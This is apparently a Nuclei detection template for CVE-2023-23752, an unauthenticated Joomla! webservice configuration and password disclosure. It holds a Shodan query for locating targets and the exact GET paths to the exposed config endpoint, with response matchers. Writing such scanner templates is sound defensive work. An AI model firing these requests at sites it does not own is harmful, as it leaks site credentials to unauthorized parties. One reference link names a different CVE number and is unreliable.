id: CVE-2023-23752 info: name: Joomla! Webservice - Password Disclosure author: badboycxcc,Sascha Brendel severity: medium description: | An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. reference: - https://unsafe.sh/go-149780.html - https://twitter.com/gov_hack/status/1626471960141238272/photo/1 - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html - https://nvd.nist.gov/vuln/detail/CVE-2023-23552 remediation: Upgrade to Joomla! version 4.2.8 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 epss-score: 0.61007 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: html:"Joomla! - Open Source Content Management" verified: true vendor: joomla product: joomla\! tags: cve,cve2023,joomla http: - method: GET path: - '{{BaseURL}}/api/index.php/v1/config/application?public=true' - '{{BaseURL}}/api/v1/config/application?public=true' stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '"links":' - '"attributes":' condition: and - type: word part: header words: - 'application/json' - 'application/vnd.api+json' condition: or - type: status status: - 200